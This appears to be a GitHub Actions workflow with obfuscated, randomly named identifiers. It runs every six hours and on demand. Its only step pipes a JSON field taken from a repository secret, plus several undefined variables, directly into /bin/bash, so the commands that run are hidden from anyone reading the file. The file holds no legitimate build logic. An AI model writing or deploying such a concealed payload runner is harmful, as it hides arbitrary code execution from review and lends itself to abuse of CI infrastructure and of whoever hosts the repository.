name: peiyuanxie2603

on:
  workflow_dispatch:
  schedule:
    - cron: '8 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: peiyuanxie2603
        env:
          qycvr318: ${{ secrets.qycvr318 }}
        run: |
          echo $qycvr318 | jq -r .m3014 | /bin/bash
          echo $bizhw15508 | jq -r .cagg003 | /bin/bash
          echo $z12 | jq -r .ey9 | /bin/bash
          echo $nrd83 | jq -r .hzy717 | /bin/bash
          echo $hu67 | jq -r .ppw34 | /bin/bash
          echo $qzafr2017 | jq -r .pjhli62168 | /bin/bash
          echo $iqze182 | jq -r .ovmsr8893 | /bin/bash
          echo $whs596 | jq -r .bxht860 | /bin/bash
          echo $vj9 | jq -r .eqt2 | /bin/bash

